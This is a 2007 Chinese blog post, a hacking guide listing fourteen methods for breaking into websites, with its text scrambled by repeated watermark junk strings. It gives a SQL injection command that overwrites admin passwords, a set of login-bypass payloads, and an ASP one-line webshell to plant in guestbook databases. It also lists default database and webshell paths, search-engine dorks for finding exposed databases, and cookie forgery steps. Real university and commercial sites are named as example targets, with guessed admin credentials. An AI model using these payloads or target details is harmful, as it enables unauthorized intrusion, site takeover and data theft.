我的梦___cracker

学黑客必读,入侵的14种可利用方法

上一篇 / 下一篇  2007-01-23 12:10:05 / 个人分类:网络技术

黑客必读,入侵14种可利用方法★黑基空间★!e4T7^ j'd3MI_Z

 

7E Z&r4Y~0

1.上传漏洞[不多讲]★黑基空间★m&yTu_!W

pS:如果看到:选择你要上传的文件[重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

&`q*jA Kk0

   有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

R7|s5kXi0

 ★黑基空间★[+R$l{|L5RX

 

@$Y2Z%h"nc e)\0

2.注入漏洞[不多讲]★黑基空间★-\j{(HK

pS:MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

ey*y3aSB ^E0

 http://注入网址;update admin set password=’新MD5密码’where password=’旧MD5密码’--    [admin为表名.]

!IiyM#H(^0

 

DX%{"m&g-]1F0

 

g/}6Yix0

3.旁注,也就是跨站.★黑基空间★v)v5v*qF1@i6v1F

我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了

)K,j8Rg/U2{'BX0

 

/U8jRXYH%m_8_H2?O0

 ★黑基空间★O.F5N2Qn~!d {

 

d wsmHh0

4.暴库:把二级目录中间的/换成%5c★黑基空间★`V3C/F0x'AL

EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1★黑基空间★j a [ f2O#m8R

如果你能看到:’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。

h9o~Y!BM|Q0

这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.★黑基空间★h3IL6|/z;DV@;j c

 ★黑基空间★6g5WW!?B b

 

+e l8gC"I0

5.or=or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:★黑基空间★M7K6y&T;Duw F

or’’=’ " or "a"="a  ’) or (’a’=’a  ") or ("a"="a  or 1=1--  ’ or ’a’=’a

$u!Gtc;YH\L;XE0

 ★黑基空间★zv w^F `s1fj

6.社会工程学。这个我们都知道吧。就是猜解。

X5bmp1L+zl(N`0

 EY:http://www.neu.edu.cn/waishi/admin

D5ij7lAKY$O0

   admin  waishi★黑基空间★#fi @hQ_~ I6B

 ★黑基空间★0H!k'W J{q9k

.写入ASP格式数据库。就是一句话木马[%execute request("value")%],常用在留言本.★黑基空间★#Dy9O-`K7{2gl3D

EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马★黑基空间★e4q8H\&^({4f+@

 ★黑基空间★ dj `s4en6{

 

P2W'\(fj%O0

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.★黑基空间★ D$Pb f1cEl ^"Y/U

EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp★黑基空间★f*l4p"Aa0]&j

这个站用的是:杰出校友录,源码我下过了,★黑基空间★`0_i0m[Ev1E

默认数据库/webshell路径:\database\liangu_data.mdb后台管理:adm_login.asp密码及用户名都是admin

2s l8ahw$d0

   

N3O.^'|6Ez8KT6b;a0

 ★黑基空间★%P*x;Ko]x1h O_

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.★黑基空间★[*Y/Txc(M

/Databackup/dvbbs7.MDB★黑基空间★cYT5Z&l(p

/bbs/Databackup/dvbbs7.MDB

&n"xb0RI%v;g0

/bbs/Data/dvbbs7.MDB★黑基空间★q@})jd2t

/data/dvbbs7.mdb

oy;UW W4}0

/bbs/diy.asp★黑基空间★-t6L}"vdN'T

/diy.asp★黑基空间★Ro+H-C8Ij

/bbs/cmd.asp★黑基空间★c0{B&^~7MSRz"N

/bbs/cmd.exe★黑基空间★5M$JR2l5Hb4N,Y i P

/bbs/s-u.exe★黑基空间★~yobQj-f$\ Kn

/bbs/servu.exe★黑基空间★-t(}/PCk)H0a"r DJ

工具:网站猎手挖掘鸡

m2j0h da,\}8H|"mz.`0

EYhttp://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

,a*TU)qU*Pk;Q0

 

+|h([P)Px~E]A0

10.查看目录法:人一些网站可以断开目录,可以方问目录。★黑基空间★^q\6C(k!U

EYhttp://www.ujs168.com/shop/admin/★黑基空间★B z#U&qY0H

 http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

*J dv.L gw_/g5v0

 这样我们可以找到数据库,下载不用我教吧★黑基空间★ jF)ZC7T4??

 ★黑基空间★ luzo.q-J

11.工具溢出:.asp?NewsID=  /2j.asp?id=18  .asp?id=[这种方法可以取得大量的WEBSHELL]★黑基空间★V$^X:i)A1R

       

u b.~?-D&|&Y0

12.搜索引擎利用:★黑基空间★Z;y;Q QpXM

 

f6z;_TV0

(1).inurl:flasher_list.asp  默认数据库:database/flash.mdb  后台/manager/

s-z/g#t+k Uf A"u0

(2).找网站的管理后台地址:★黑基空间★b!XF9Co3j|b(p

site:xxxx.comintext:管理

_/Fo2m.`'v7Je*P0

site:xxxx.comintitle:管理  〈关键字很多,自已找〉★黑基空间★oYc l kT |9T_(_w

site:xxxx.cominurl:login

g5z7F |^CTeR#R0

(3).查找access的数据库,mssqlmysql的连接文件

6hL2V1KbU+x0

allinurl:bbsdata★黑基空间★k?S6B?1}6?@

filetype:mdbinurl:database★黑基空间★!O7f0r]B6ca

filetype:incconn

6RI#ovd H8]9P0

inurl:datafiletype:mdb

]*O2t|0c,s+u3P]0

我主不做了。。自已做做吧。。★黑基空间★q-tg se;ja

 ★黑基空间★/H8G8~o Np

13.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了★黑基空间★+t9}E c%M Fx9q XO#@

 ★黑基空间★7U8HzF`PO:s

 

[\KC/h a+O-u0

14.利用常见的漏洞:如动网BBS★黑基空间★9X*p)M^r%ccz7cC

EYhttp://js1011.com/bbs/index.asp

,L}K][%?TY0

可以先用:dvbbs权限提升工具,使自已成为前台管理员。★黑基空间★o`4?R&Zk0Rt6BI

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC★黑基空间★A9Nu QJRe7W)a

这个我就不做了,网上教程多的是,自已下个看看。

/?7~%PmM'@'E0

工具:dvbbs权限提升工具  动网固顶贴工具

_o gd%]"lpea0

 

qN#\_2}%U0

15.还有一些老漏洞。如IIS34的查看源码,5DELETE★黑基空间★ Es G F"\t3Upv

 CGIPHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。 ★黑基空间★j\*u@ ^ p G

★黑基空间★+ze } [h

 

@vA}!\,e0

TAG: 黑客 入侵 方法 网络技术

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

日历

« 2008-10-16  
   1234
567891011
12131415161718
19202122232425
262728293031 

数据统计

  • 访问量: 2024
  • 日志数: 31
  • 建立时间: 2007-01-19
  • 更新时间: 2007-03-30

RSS订阅

Open Toolbar